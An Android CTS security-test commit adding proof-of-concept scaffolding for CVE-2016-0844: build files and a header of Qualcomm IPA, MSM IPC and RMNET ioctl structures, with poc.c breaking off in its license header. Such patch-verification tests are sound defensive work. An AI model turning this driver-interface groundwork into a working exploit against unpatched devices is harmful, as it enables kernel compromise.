[RESTRICT AUTOMERGE]: CTS test for Android Security b/72509609 b/26324307

Test: successful run of newly introduced CTS test case.
Bug: 72509609
Bug: 26324307

Change-Id: I02fff0d3522b291b74c5a1a6c7ca6c7dfd8368a2
Signed-off-by: manish <manish.pandey2@harman.corp-partner.google.com>
(cherry picked from commit cac61d428a1c1cd42fd994f4acdb9a7d5414aead)

5 files changed, 741 insertions, 0 deletions

diff --git a/hostsidetests/security/AndroidTest.xml b/hostsidetests/security/AndroidTest.xml
index 28699b99257..6fdd84042a7 100755
--- a/hostsidetests/security/AndroidTest.xml
+++ b/hostsidetests/security/AndroidTest.xml
@@ -44,6 +44,7 @@
         <!--__________________-->
         <!-- Bulletin 2016-04 -->
         <!-- Please add tests solely from this bulletin below to avoid merge conflict -->
+        <option name="push" value="CVE-2016-0844->/data/local/tmp/CVE-2016-0844" />
         <option name="push" value="CVE-2016-2419->/data/local/tmp/CVE-2016-2419" />
 
         <!-- Bulletin 2016-05 -->
diff --git a/hostsidetests/security/securityPatch/CVE-2016-0844/Android.mk b/hostsidetests/security/securityPatch/CVE-2016-0844/Android.mk
new file mode 100644
index 00000000000..19585cc7132
--- /dev/null
+++ b/hostsidetests/security/securityPatch/CVE-2016-0844/Android.mk
@@ -0,0 +1,33 @@
+# Copyright (C) 2018 The Android Open Source Project
+#
+# Licensed under the Apache License, Version 2.0 (the "License");
+# you may not use this file except in compliance with the License.
+# You may obtain a copy of the License at
+#
+#      http://www.apache.org/licenses/LICENSE-2.0
+#
+# Unless required by applicable law or agreed to in writing, software
+# distributed under the License is distributed on an "AS IS" BASIS,
+# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+# See the License for the specific language governing permissions and
+# limitations under the License.
+
+LOCAL_PATH := $(call my-dir)
+
+include $(CLEAR_VARS)
+LOCAL_MODULE := CVE-2016-0844
+LOCAL_SRC_FILES := poc.c
+LOCAL_MULTILIB := both
+LOCAL_MODULE_STEM_32 := $(LOCAL_MODULE)32
+LOCAL_MODULE_STEM_64 := $(LOCAL_MODULE)64
+
+# Tag this module as a cts test artifact
+LOCAL_COMPATIBILITY_SUITE := cts sts
+LOCAL_CTS_TEST_PACKAGE := android.security.cts
+
+LOCAL_ARM_MODE := arm
+LOCAL_CFLAGS += -Wall -Werror
+LOCAL_CFLAGS += -Iinclude -fPIE
+LOCAL_LDFLAGS += -fPIE -pie
+LOCAL_LDFLAGS += -rdynamic
+include $(BUILD_CTS_EXECUTABLE)
diff --git a/hostsidetests/security/securityPatch/CVE-2016-0844/local_poc.h b/hostsidetests/security/securityPatch/CVE-2016-0844/local_poc.h
new file mode 100644
index 00000000000..960c9df9d87
--- /dev/null
+++ b/hostsidetests/security/securityPatch/CVE-2016-0844/local_poc.h
@@ -0,0 +1,620 @@
+/**
+ * Copyright (C) 2018 The Android Open Source Project
+ *
+ * Licensed under the Apache License, Version 2.0 (the "License");
+ * you may not use this file except in compliance with the License.
+ * You may obtain a copy of the License at
+ *
+ *      http://www.apache.org/licenses/LICENSE-2.0
+ *
+ * Unless required by applicable law or agreed to in writing, software
+ * distributed under the License is distributed on an "AS IS" BASIS,
+ * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+ * See the License for the specific language governing permissions vand
+ * limitations under the License.
+ */
+#include <sys/types.h>
+#ifndef IPA_QMI_SERVICE_V01_H
+#define IPA_QMI_SERVICE_V01_H
+
+#define QMI_IPA_IPFLTR_NUM_IHL_RANGE_16_EQNS_V01 2
+#define QMI_IPA_IPFLTR_NUM_MEQ_32_EQNS_V01 2
+#define QMI_IPA_IPFLTR_NUM_IHL_MEQ_32_EQNS_V01 2
+#define QMI_IPA_IPFLTR_NUM_MEQ_128_EQNS_V01 2
+#define QMI_IPA_MAX_FILTERS_V01 64
+
+#define IPA_INT_MAX ((int)(~0U >> 1))
+#define IPA_INT_MIN (-IPA_INT_MAX - 1)
+
+enum ipa_qmi_result_type_v01 {
+  IPA_QMI_RESULT_TYPE_MIN_ENUM_VAL_V01 = IPA_INT_MIN,
+  IPA_QMI_RESULT_SUCCESS_V01 = 0,
+  IPA_QMI_RESULT_FAILURE_V01 = 1,
+  IPA_QMI_RESULT_TYPE_MAX_ENUM_VAL_V01 = IPA_INT_MAX,
+};
+
+enum ipa_qmi_error_type_v01 {
+  IPA_QMI_ERROR_TYPE_MIN_ENUM_VAL_V01 = IPA_INT_MIN,
+  IPA_QMI_ERR_NONE_V01 = 0x0000,
+  IPA_QMI_ERR_MALFORMED_MSG_V01 = 0x0001,
+  IPA_QMI_ERR_NO_MEMORY_V01 = 0x0002,
+  IPA_QMI_ERR_INTERNAL_V01 = 0x0003,
+  IPA_QMI_ERR_CLIENT_IDS_EXHAUSTED_V01 = 0x0005,
+  IPA_QMI_ERR_INVALID_ID_V01 = 0x0029,
+  IPA_QMI_ERR_ENCODING_V01 = 0x003A,
+  IPA_QMI_ERR_INCOMPATIBLE_STATE_V01 = 0x005A,
+  IPA_QMI_ERR_NOT_SUPPORTED_V01 = 0x005E,
+  IPA_QMI_ERROR_TYPE_MAX_ENUM_VAL_V01 = IPA_INT_MAX,
+};
+
+struct ipa_qmi_response_type_v01 {
+  enum ipa_qmi_result_type_v01 result;
+  enum ipa_qmi_error_type_v01 error;
+};
+
+enum ipa_platform_type_enum_v01 {
+  IPA_PLATFORM_TYPE_ENUM_MIN_ENUM_VAL_V01 = -2147483647,
+  QMI_IPA_PLATFORM_TYPE_INVALID_V01 = 0,
+  QMI_IPA_PLATFORM_TYPE_TN_V01 = 1,
+  QMI_IPA_PLATFORM_TYPE_LE_V01 = 2,
+  QMI_IPA_PLATFORM_TYPE_MSM_ANDROID_V01 = 3,
+  QMI_IPA_PLATFORM_TYPE_MSM_WINDOWS_V01 = 4,
+  QMI_IPA_PLATFORM_TYPE_MSM_QNX_V01 = 5,
+  IPA_PLATFORM_TYPE_ENUM_MAX_ENUM_VAL_V01 = 2147483647
+};
+
+struct ipa_hdr_tbl_info_type_v01 {
+  uint32_t modem_offset_start;
+  uint32_t modem_offset_end;
+};
+
+struct ipa_route_tbl_info_type_v01 {
+  uint32_t route_tbl_start_addr;
+  uint32_t num_indices;
+};
+
+struct ipa_modem_mem_info_type_v01 {
+  uint32_t block_start_addr;
+  uint32_t size;
+};
+
+struct ipa_hdr_proc_ctx_tbl_info_type_v01 {
+  uint32_t modem_offset_start;
+  uint32_t modem_offset_end;
+};
+
+struct ipa_zip_tbl_info_type_v01 {
+  uint32_t modem_offset_start;
+  uint32_t modem_offset_end;
+};
+
+struct ipa_init_modem_driver_req_msg_v01 {
+  uint8_t platform_type_valid;
+  enum ipa_platform_type_enum_v01 platform_type;
+  uint8_t hdr_tbl_info_valid;
+  struct ipa_hdr_tbl_info_type_v01 hdr_tbl_info;
+  uint8_t v4_route_tbl_info_valid;
+  struct ipa_route_tbl_info_type_v01 v4_route_tbl_info;
+  uint8_t v6_route_tbl_info_valid;
+  struct ipa_route_tbl_info_type_v01 v6_route_tbl_info;
+  uint8_t v4_filter_tbl_start_addr_valid;
+  uint32_t v4_filter_tbl_start_addr;
+  uint8_t v6_filter_tbl_start_addr_valid;
+  uint32_t v6_filter_tbl_start_addr;
+  uint8_t modem_mem_info_valid;
+  struct ipa_modem_mem_info_type_v01 modem_mem_info;
+  uint8_t ctrl_comm_dest_end_pt_valid;
+  uint32_t ctrl_comm_dest_end_pt;
+  uint8_t is_ssr_bootup_valid;
+  uint8_t is_ssr_bootup;
+  uint8_t hdr_proc_ctx_tbl_info_valid;
+  struct ipa_hdr_proc_ctx_tbl_info_type_v01 hdr_proc_ctx_tbl_info;
+  uint8_t zip_tbl_info_valid;
+  struct ipa_zip_tbl_info_type_v01 zip_tbl_info;
+};
+
+struct ipa_init_modem_driver_resp_msg_v01 {
+  struct ipa_qmi_response_type_v01 resp;
+  uint8_t ctrl_comm_dest_end_pt_valid;
+  uint32_t ctrl_comm_dest_end_pt;
+  uint8_t default_end_pt_valid;
+  uint32_t default_end_pt;
+};
+
+struct ipa_indication_reg_req_msg_v01 {
+  uint8_t master_driver_init_complete_valid;
+  uint8_t master_driver_init_complete;
+};
+
+struct ipa_indication_reg_resp_msg_v01 {
+  struct ipa_qmi_response_type_v01 resp;
+};
+
+struct ipa_master_driver_init_complt_ind_msg_v01 {
+  struct ipa_qmi_response_type_v01 master_driver_init_status;
+};
+
+struct ipa_ipfltr_range_eq_16_type_v01 {
+  uint8_t offset;
+  uint16_t range_low;
+  uint16_t range_high;
+};
+
+struct ipa_ipfltr_mask_eq_32_type_v01 {
+  uint8_t offset;
+  uint32_t mask;
+  uint32_t value;
+};
+
+struct ipa_ipfltr_eq_16_type_v01 {
+  uint8_t offset;
+  uint16_t value;
+};
+
+struct ipa_ipfltr_eq_32_type_v01 {
+  uint8_t offset;
+  uint32_t value;
+};
+
+struct ipa_ipfltr_mask_eq_128_type_v01 {
+  uint8_t offset;
+  uint8_t mask[16];
+  uint8_t value[16];
+};
+
+struct ipa_filter_rule_type_v01 {
+  uint16_t rule_eq_bitmap;
+  uint8_t tos_eq_present;
+  uint8_t tos_eq;
+  uint8_t protocol_eq_present;
+  uint8_t protocol_eq;
+  uint8_t num_ihl_offset_range_16;
+
+  struct ipa_ipfltr_range_eq_16_type_v01
+      ihl_offset_range_16[QMI_IPA_IPFLTR_NUM_IHL_RANGE_16_EQNS_V01];
+
+  uint8_t num_offset_meq_32;
+
+  struct ipa_ipfltr_mask_eq_32_type_v01
+      offset_meq_32[QMI_IPA_IPFLTR_NUM_MEQ_32_EQNS_V01];
+
+  uint8_t tc_eq_present;
+  uint8_t tc_eq;
+  uint8_t flow_eq_present;
+  uint32_t flow_eq;
+  uint8_t ihl_offset_eq_16_present;
+  struct ipa_ipfltr_eq_16_type_v01 ihl_offset_eq_16;
+  uint8_t ihl_offset_eq_32_present;
+  struct ipa_ipfltr_eq_32_type_v01 ihl_offset_eq_32;
+  uint8_t num_ihl_offset_meq_32;
+  struct ipa_ipfltr_mask_eq_32_type_v01
+      ihl_offset_meq_32[QMI_IPA_IPFLTR_NUM_IHL_MEQ_32_EQNS_V01];
+  uint8_t num_offset_meq_128;
+  struct ipa_ipfltr_mask_eq_128_type_v01
+      offset_meq_128[QMI_IPA_IPFLTR_NUM_MEQ_128_EQNS_V01];
+
+  uint8_t metadata_meq32_present;
+
+  struct ipa_ipfltr_mask_eq_32_type_v01 metadata_meq32;
+  uint8_t ipv4_frag_eq_present;
+};
+
+enum ipa_ip_type_enum_v01 {
+  IPA_IP_TYPE_ENUM_MIN_ENUM_VAL_V01 = -2147483647,
+  QMI_IPA_IP_TYPE_INVALID_V01 = 0,
+  QMI_IPA_IP_TYPE_V4_V01 = 1,
+  QMI_IPA_IP_TYPE_V6_V01 = 2,
+  QMI_IPA_IP_TYPE_V4V6_V01 = 3,
+  IPA_IP_TYPE_ENUM_MAX_ENUM_VAL_V01 = 2147483647
+};
+
+enum ipa_filter_action_enum_v01 {
+  IPA_FILTER_ACTION_ENUM_MIN_ENUM_VAL_V01 = -2147483647,
+  QMI_IPA_FILTER_ACTION_INVALID_V01 = 0,
+  QMI_IPA_FILTER_ACTION_SRC_NAT_V01 = 1,
+  QMI_IPA_FILTER_ACTION_DST_NAT_V01 = 2,
+  QMI_IPA_FILTER_ACTION_ROUTING_V01 = 3,
+  QMI_IPA_FILTER_ACTION_EXCEPTION_V01 = 4,
+  IPA_FILTER_ACTION_ENUM_MAX_ENUM_VAL_V01 = 2147483647
+};
+
+struct ipa_filter_spec_type_v01 {
+  uint32_t filter_spec_identifier;
+  enum ipa_ip_type_enum_v01 ip_type;
+  struct ipa_filter_rule_type_v01 filter_rule;
+  enum ipa_filter_action_enum_v01 filter_action;
+  uint8_t is_routing_table_index_valid;
+  uint32_t route_table_index;
+  uint8_t is_mux_id_valid;
+  uint32_t mux_id;
+};
+
+struct ipa_install_fltr_rule_req_msg_v01 {
+  uint8_t filter_spec_list_valid;
+  uint32_t filter_spec_list_len;
+  struct ipa_filter_spec_type_v01 filter_spec_list[QMI_IPA_MAX_FILTERS_V01];
+  uint8_t source_pipe_index_valid;
+  uint32_t source_pipe_index;
+  uint8_t num_ipv4_filters_valid;
+  uint32_t num_ipv4_filters;
+  uint8_t num_ipv6_filters_valid;
+  uint32_t num_ipv6_filters;
+  uint8_t xlat_filter_indices_list_valid;
+  uint32_t xlat_filter_indices_list_len;
+  uint32_t xlat_filter_indices_list[QMI_IPA_MAX_FILTERS_V01];
+};
+
+struct ipa_filter_rule_identifier_to_handle_map_v01 {
+  uint32_t filter_spec_identifier;
+  uint32_t filter_handle;
+};
+
+struct ipa_install_fltr_rule_resp_msg_v01 {
+  struct ipa_qmi_response_type_v01 resp;
+  uint8_t filter_handle_list_valid;
+  uint32_t filter_handle_list_len;
+  struct ipa_filter_rule_identifier_to_handle_map_v01
+      filter_handle_list[QMI_IPA_MAX_FILTERS_V01];
+};
+
+struct ipa_filter_handle_to_index_map_v01 {
+  uint32_t filter_handle;
+  uint32_t filter_index;
+};
+
+struct ipa_fltr_installed_notif_req_msg_v01 {
+  uint32_t source_pipe_index;
+  enum ipa_qmi_result_type_v01 install_status;
+  uint32_t filter_index_list_len;
+  struct ipa_filter_handle_to_index_map_v01
+      filter_index_list[QMI_IPA_MAX_FILTERS_V01];
+
+  uint8_t embedded_pipe_index_valid;
+  uint32_t embedded_pipe_index;
+  uint8_t retain_header_valid;
+  uint8_t retain_header;
+  uint8_t embedded_call_mux_id_valid;
+  uint32_t embedded_call_mux_id;
+  uint8_t num_ipv4_filters_valid;
+  uint32_t num_ipv4_filters;
+  uint8_t num_ipv6_filters_valid;
+  uint32_t num_ipv6_filters;
+  uint8_t start_ipv4_filter_idx_valid;
+  uint32_t start_ipv4_filter_idx;
+  uint8_t start_ipv6_filter_idx_valid;
+  uint32_t start_ipv6_filter_idx;
+};
+
+struct ipa_fltr_installed_notif_resp_msg_v01 {
+  struct ipa_qmi_response_type_v01 resp;
+};
+
+struct ipa_enable_force_clear_datapath_req_msg_v01 {
+  uint32_t source_pipe_bitmask;
+  uint32_t request_id;
+  uint8_t throttle_source_valid;
+  uint8_t throttle_source;
+};
+
+struct ipa_enable_force_clear_datapath_resp_msg_v01 {
+  struct ipa_qmi_response_type_v01 resp;
+};
+
+struct ipa_disable_force_clear_datapath_req_msg_v01 {
+  uint32_t request_id;
+};
+
+struct ipa_disable_force_clear_datapath_resp_msg_v01 {
+  struct ipa_qmi_response_type_v01 resp;
+};
+
+enum ipa_peripheral_speed_enum_v01 {
+  IPA_PERIPHERAL_SPEED_ENUM_MIN_ENUM_VAL_V01 = -2147483647,
+  QMI_IPA_PER_USB_FS_V01 = 1,
+  QMI_IPA_PER_USB_HS_V01 = 2,
+  QMI_IPA_PER_USB_SS_V01 = 3,
+  IPA_PERIPHERAL_SPEED_ENUM_MAX_ENUM_VAL_V01 = 2147483647
+};
+
+enum ipa_pipe_mode_enum_v01 {
+  IPA_PIPE_MODE_ENUM_MIN_ENUM_VAL_V01 = -2147483647,
+  QMI_IPA_PIPE_MODE_HW_V01 = 1,
+  QMI_IPA_PIPE_MODE_SW_V01 = 2,
+  IPA_PIPE_MODE_ENUM_MAX_ENUM_VAL_V01 = 2147483647
+};
+
+enum ipa_peripheral_type_enum_v01 {
+  IPA_PERIPHERAL_TYPE_ENUM_MIN_ENUM_VAL_V01 = -2147483647,
+  QMI_IPA_PERIPHERAL_USB_V01 = 1,
+  QMI_IPA_PERIPHERAL_HSIC_V01 = 2,
+  QMI_IPA_PERIPHERAL_PCIE_V01 = 3,
+  IPA_PERIPHERAL_TYPE_ENUM_MAX_ENUM_VAL_V01 = 2147483647
+};
+
+struct ipa_config_req_msg_v01 {
+  uint8_t peripheral_type_valid;
+  enum ipa_peripheral_type_enum_v01 peripheral_type;
+  uint8_t hw_deaggr_supported_valid;
+  uint8_t hw_deaggr_supported;
+  uint8_t max_aggr_frame_size_valid;
+  uint32_t max_aggr_frame_size;
+  uint8_t ipa_ingress_pipe_mode_valid;
+  enum ipa_pipe_mode_enum_v01 ipa_ingress_pipe_mode;
+  uint8_t peripheral_speed_info_valid;
+  enum ipa_peripheral_speed_enum_v01 peripheral_speed_info;
+  uint8_t dl_accumulation_time_limit_valid;
+  uint32_t dl_accumulation_time_limit;
+  uint8_t dl_accumulation_pkt_limit_valid;
+  uint32_t dl_accumulation_pkt_limit;
+  uint8_t dl_accumulation_byte_limit_valid;
+  uint32_t dl_accumulation_byte_limit;
+  uint8_t ul_accumulation_time_limit_valid;
+  uint32_t ul_accumulation_time_limit;
+  uint8_t hw_control_flags_valid;
+  uint32_t hw_control_flags;
+  uint8_t ul_msi_event_threshold_valid;
+  uint32_t ul_msi_event_threshold;
+  uint8_t dl_msi_event_threshold_valid;
+  uint32_t dl_msi_event_threshold;
+};
+
+struct ipa_config_resp_msg_v01 {
+  struct ipa_qmi_response_type_v01 resp;
+};
+
+/*Service Message Definition*/
+#define QMI_IPA_INDICATION_REGISTER_REQ_V01 0x0020
+#define QMI_IPA_INDICATION_REGISTER_RESP_V01 0x0020
+#define QMI_IPA_INIT_MODEM_DRIVER_REQ_V01 0x0021
+#define QMI_IPA_INIT_MODEM_DRIVER_RESP_V01 0x0021
+#define QMI_IPA_MASTER_DRIVER_INIT_COMPLETE_IND_V01 0x0022
+#define QMI_IPA_INSTALL_FILTER_RULE_REQ_V01 0x0023
+#define QMI_IPA_INSTALL_FILTER_RULE_RESP_V01 0x0023
+#define QMI_IPA_FILTER_INSTALLED_NOTIF_REQ_V01 0x0024
+#define QMI_IPA_FILTER_INSTALLED_NOTIF_RESP_V01 0x0024
+#define QMI_IPA_ENABLE_FORCE_CLEAR_DATAPATH_REQ_V01 0x0025
+#define QMI_IPA_ENABLE_FORCE_CLEAR_DATAPATH_RESP_V01 0x0025
+#define QMI_IPA_DISABLE_FORCE_CLEAR_DATAPATH_REQ_V01 0x0026
+#define QMI_IPA_DISABLE_FORCE_CLEAR_DATAPATH_RESP_V01 0x0026
+#define QMI_IPA_CONFIG_REQ_V01 0x0027
+#define QMI_IPA_CONFIG_RESP_V01 0x0027
+
+/* add for max length*/
+#define QMI_IPA_INIT_MODEM_DRIVER_REQ_MAX_MSG_LEN_V01 98
+#define QMI_IPA_INIT_MODEM_DRIVER_RESP_MAX_MSG_LEN_V01 21
+#define QMI_IPA_INDICATION_REGISTER_REQ_MAX_MSG_LEN_V01 4
+#define QMI_IPA_INDICATION_REGISTER_RESP_MAX_MSG_LEN_V01 7
+#define QMI_IPA_INSTALL_FILTER_RULE_REQ_MAX_MSG_LEN_V01 11293
+#define QMI_IPA_INSTALL_FILTER_RULE_RESP_MAX_MSG_LEN_V01 523
+#define QMI_IPA_FILTER_INSTALLED_NOTIF_REQ_MAX_MSG_LEN_V01 574
+#define QMI_IPA_FILTER_INSTALLED_NOTIF_RESP_MAX_MSG_LEN_V01 7
+#define QMI_IPA_MASTER_DRIVER_INIT_COMPLETE_IND_MAX_MSG_LEN_V01 7
+
+#define QMI_IPA_ENABLE_FORCE_CLEAR_DATAPATH_REQ_MAX_MSG_LEN_V01 18
+#define QMI_IPA_DISABLE_FORCE_CLEAR_DATAPATH_REQ_MAX_MSG_LEN_V01 7
+#define QMI_IPA_ENABLE_FORCE_CLEAR_DATAPATH_RESP_MAX_MSG_LEN_V01 7
+#define QMI_IPA_DISABLE_FORCE_CLEAR_DATAPATH_RESP_MAX_MSG_LEN_V01 7
+
+#define QMI_IPA_CONFIG_REQ_MAX_MSG_LEN_V01 81
+#define QMI_IPA_CONFIG_RESP_MAX_MSG_LEN_V01 7
+/* Service Object Accessor */
+
+#endif /* IPA_QMI_SERVICE_V01_H */
+
+#ifndef _UAPI_MSM_IPC_H_
+#define _UAPI_MSM_IPC_H_
+
+#include <linux/ioctl.h>
+#include <linux/types.h>
+
+struct msm_ipc_port_addr {
+  uint32_t node_id;
+  uint32_t port_id;
+};
+
+struct msm_ipc_port_name {
+  uint32_t service;
+  uint32_t instance;
+};
+
+struct msm_ipc_addr {
+  unsigned char addrtype;
+  union {
+    struct msm_ipc_port_addr port_addr;
+    struct msm_ipc_port_name port_name;
+  } addr;
+};
+
+#define MSM_IPC_WAIT_FOREVER (~0) /* timeout for permanent subscription */
+
+#ifndef AF_MSM_IPC
+#define AF_MSM_IPC 27
+#endif
+
+#ifndef PF_MSM_IPC
+#define PF_MSM_IPC AF_MSM_IPC
+#endif
+
+#define MSM_IPC_ADDR_NAME 1
+#define MSM_IPC_ADDR_ID 2
+
+struct sockaddr_msm_ipc {
+  unsigned short family;
+  struct msm_ipc_addr address;
+  unsigned char reserved;
+};
+
+struct config_sec_rules_args {
+  int num_group_info;
+  uint32_t service_id;
+  uint32_t instance_id;
+  unsigned reserved;
+  gid_t group_id[0];
+};
+
+#define IPC_ROUTER_IOCTL_MAGIC (0xC3)
+
+#define IPC_ROUTER_IOCTL_GET_VERSION                                           \
+  _IOR(IPC_ROUTER_IOCTL_MAGIC, 0, unsigned int)
+
+#define IPC_ROUTER_IOCTL_GET_MTU _IOR(IPC_ROUTER_IOCTL_MAGIC, 1, unsigned int)
+
+#define IPC_ROUTER_IOCTL_LOOKUP_SERVER                                         \
+  _IOWR(IPC_ROUTER_IOCTL_MAGIC, 2, struct sockaddr_msm_ipc)
+
+#define IPC_ROUTER_IOCTL_GET_CURR_PKT_SIZE                                     \
+  _IOR(IPC_ROUTER_IOCTL_MAGIC, 3, unsigned int)
+
+#define IPC_ROUTER_IOCTL_BIND_CONTROL_PORT                                     \
+  _IOR(IPC_ROUTER_IOCTL_MAGIC, 4, unsigned int)
+
+#define IPC_ROUTER_IOCTL_CONFIG_SEC_RULES                                      \
+  _IOR(IPC_ROUTER_IOCTL_MAGIC, 5, struct config_sec_rules_args)
+
+struct msm_ipc_server_info {
+  uint32_t node_id;
+  uint32_t port_id;
+  uint32_t service;
+  uint32_t instance;
+};
+
+struct server_lookup_args {
+  struct msm_ipc_port_name port_name;
+  int num_entries_in_array;
+  int num_entries_found;
+  uint32_t lookup_mask;
+  struct msm_ipc_server_info srv_info[0];
+};
+
+#endif
+
+#ifndef _UAPI_MSM_RMNET_H_
+#define _UAPI_MSM_RMNET_H_
+
+/* Bitmap macros for RmNET driver operation mode. */
+#define RMNET_MODE_NONE (0x00)
+#define RMNET_MODE_LLP_ETH (0x01)
+#define RMNET_MODE_LLP_IP (0x02)
+#define RMNET_MODE_QOS (0x04)
+#define RMNET_MODE_MASK                                                        \
+  (RMNET_MODE_LLP_ETH | RMNET_MODE_LLP_IP | RMNET_MODE_QOS)
+
+#define RMNET_IS_MODE_QOS(mode) ((mode & RMNET_MODE_QOS) == RMNET_MODE_QOS)
+#define RMNET_IS_MODE_IP(mode) ((mode & RMNET_MODE_LLP_IP) == RMNET_MODE_LLP_IP)
+
+enum rmnet_ioctl_cmds_e {
+  RMNET_IOCTL_SET_LLP_ETHERNET = 0x000089F1, /* Set Ethernet protocol  */
+  RMNET_IOCTL_SET_LLP_IP = 0x000089F2,       /* Set RAWIP protocol     */
+  RMNET_IOCTL_GET_LLP = 0x000089F3,          /* Get link protocol      */
+  RMNET_IOCTL_SET_QOS_ENABLE = 0x000089F4,   /* Set QoS header enabled */
+  RMNET_IOCTL_SET_QOS_DISABLE = 0x000089F5,  /* Set QoS header disabled*/
+  RMNET_IOCTL_GET_QOS = 0x000089F6,          /* Get QoS header state   */
+  RMNET_IOCTL_GET_OPMODE = 0x000089F7,       /* Get operation mode     */
+  RMNET_IOCTL_OPEN = 0x000089F8,             /* Open transport port    */
+  RMNET_IOCTL_CLOSE = 0x000089F9,            /* Close transport port   */
+  RMNET_IOCTL_FLOW_ENABLE = 0x000089FA,      /* Flow enable            */
+  RMNET_IOCTL_FLOW_DISABLE = 0x000089FB,     /* Flow disable           */
+  RMNET_IOCTL_FLOW_SET_HNDL = 0x000089FC,    /* Set flow handle        */
+  RMNET_IOCTL_EXTENDED = 0x000089FD,         /* Extended IOCTLs        */
+  RMNET_IOCTL_MAX
+};
+
+enum rmnet_ioctl_extended_cmds_e {
+  /* RmNet Data Required IOCTLs */
+  RMNET_IOCTL_GET_SUPPORTED_FEATURES = 0x0000,   /* Get features    */
+  RMNET_IOCTL_SET_MRU = 0x0001,                  /* Set MRU         */
+  RMNET_IOCTL_GET_MRU = 0x0002,                  /* Get MRU         */
+  RMNET_IOCTL_GET_EPID = 0x0003,                 /* Get endpoint ID */
+  RMNET_IOCTL_GET_DRIVER_NAME = 0x0004,          /* Get driver name */
+  RMNET_IOCTL_ADD_MUX_CHANNEL = 0x0005,          /* Add MUX ID      */
+  RMNET_IOCTL_SET_EGRESS_DATA_FORMAT = 0x0006,   /* Set EDF         */
+  RMNET_IOCTL_SET_INGRESS_DATA_FORMAT = 0x0007,  /* Set IDF         */
+  RMNET_IOCTL_SET_AGGREGATION_COUNT = 0x0008,    /* Set agg count   */
+  RMNET_IOCTL_GET_AGGREGATION_COUNT = 0x0009,    /* Get agg count   */
+  RMNET_IOCTL_SET_AGGREGATION_SIZE = 0x000A,     /* Set agg size    */
+  RMNET_IOCTL_GET_AGGREGATION_SIZE = 0x000B,     /* Get agg size    */
+  RMNET_IOCTL_FLOW_CONTROL = 0x000C,             /* Do flow control */
+  RMNET_IOCTL_GET_DFLT_CONTROL_CHANNEL = 0x000D, /* For legacy use  */
+  RMNET_IOCTL_GET_HWSW_MAP = 0x000E,             /* Get HW/SW map   */
+  RMNET_IOCTL_SET_RX_HEADROOM = 0x000F,          /* RX Headroom     */
+  RMNET_IOCTL_GET_EP_PAIR = 0x0010,              /* Endpoint pair   */
+  RMNET_IOCTL_SET_QOS_VERSION = 0x0011,          /* 8/6 byte QoS hdr*/
+  RMNET_IOCTL_GET_QOS_VERSION = 0x0012,          /* 8/6 byte QoS hdr*/
+  RMNET_IOCTL_GET_SUPPORTED_QOS_MODES = 0x0013,  /* Get QoS modes   */
+  RMNET_IOCTL_SET_SLEEP_STATE = 0x0014,          /* Set sleep state */
+  RMNET_IOCTL_SET_XLAT_DEV_INFO = 0x0015,        /* xlat dev name   */
+  RMNET_IOCTL_EXTENDED_MAX = 0x0016
+};
+
+/* Return values for the RMNET_IOCTL_GET_SUPPORTED_FEATURES IOCTL */
+#define RMNET_IOCTL_FEAT_NOTIFY_MUX_CHANNEL (1 << 0)
+#define RMNET_IOCTL_FEAT_SET_EGRESS_DATA_FORMAT (1 << 1)
+#define RMNET_IOCTL_FEAT_SET_INGRESS_DATA_FORMAT (1 << 2)
+#define RMNET_IOCTL_FEAT_SET_AGGREGATION_COUNT (1 << 3)
+#define RMNET_IOCTL_FEAT_GET_AGGREGATION_COUNT (1 << 4)
+#define RMNET_IOCTL_FEAT_SET_AGGREGATION_SIZE (1 << 5)
+#define RMNET_IOCTL_FEAT_GET_AGGREGATION_SIZE (1 << 6)
+#define RMNET_IOCTL_FEAT_FLOW_CONTROL (1 << 7)
+#define RMNET_IOCTL_FEAT_GET_DFLT_CONTROL_CHANNEL (1 << 8)
+#define RMNET_IOCTL_FEAT_GET_HWSW_MAP (1 << 9)
+
+/* Input values for the RMNET_IOCTL_SET_EGRESS_DATA_FORMAT IOCTL  */
+#define RMNET_IOCTL_EGRESS_FORMAT_MAP (1 << 1)
+#define RMNET_IOCTL_EGRESS_FORMAT_AGGREGATION (1 << 2)
+#define RMNET_IOCTL_EGRESS_FORMAT_MUXING (1 << 3)
+#define RMNET_IOCTL_EGRESS_FORMAT_CHECKSUM (1 << 4)
+
+/* Input values for the RMNET_IOCTL_SET_INGRESS_DATA_FORMAT IOCTL */
+#define RMNET_IOCTL_INGRESS_FORMAT_MAP (1 << 1)
+#define RMNET_IOCTL_INGRESS_FORMAT_DEAGGREGATION (1 << 2)
+#define RMNET_IOCTL_INGRESS_FORMAT_DEMUXING (1 << 3)
+#define RMNET_IOCTL_INGRESS_FORMAT_CHECKSUM (1 << 4)
+
+/* User space may not have this defined. */
+#ifndef IFNAMSIZ
+#define IFNAMSIZ 16
+#endif
+
+struct rmnet_ioctl_extended_s {
+  uint32_t extended_ioctl;
+  union {
+    uint32_t data; /* Generic data field for most extended IOCTLs */
+    int8_t if_name[IFNAMSIZ];
+    struct {
+      uint32_t mux_id;
+      int8_t vchannel_name[IFNAMSIZ];
+    } rmnet_mux_val;
+    struct {
+      uint8_t flow_mode;
+      uint8_t mux_id;
+    } flow_control_prop;
+    struct {
+      uint32_t consumer_pipe_num;
+      uint32_t producer_pipe_num;
+    } ipa_ep_pair;
+  } u;
+};
+
+struct rmnet_ioctl_data_s {
+  union {
+    uint32_t operation_mode;
+    uint32_t tcm_handle;
+  } u;
+};
+
+#define RMNET_IOCTL_QOS_MODE_6 (1 << 0)
+#define RMNET_IOCTL_QOS_MODE_8 (1 << 1)
+
+#define QMI_QOS_HDR_S __attribute((__packed__)) qmi_qos_hdr_s
+struct QMI_QOS_HDR_S {
+  unsigned char version;
+  unsigned char flags;
+  uint32_t flow_id;
+};
+
+struct qmi_qos_hdr8_s {
+  struct QMI_QOS_HDR_S hdr;
+  uint8_t reserved[2];
+} __attribute((__packed__));
+
+#endif
diff --git a/hostsidetests/security/securityPatch/CVE-2016-0844/poc.c b/hostsidetests/security/securityPatch/CVE-2016-0844/poc.c
new file mode 100644
index 00000000000..12427684710
--- /dev/null
+++ b/hostsidetests/security/securityPatch/CVE-2016-0844/poc.c
@@ -0,0 +1,79 @@
+/**
+ * Copyright (C) 2018 The Android Open Source Project
+ *
+ * Licensed under the Apache License, Version 2.0 (the "License");
+ * you may not use this file except in compliance with the License.
+ * You may obtain a copy of the License at
+ *
+ *      http://www.apache.org/licenses/LICENSE-2.0
+ *
+ * Unless required by applicable law or agreed to in writing, software
+ * distributed under the License is distributed on an "AS IS" BASIS,
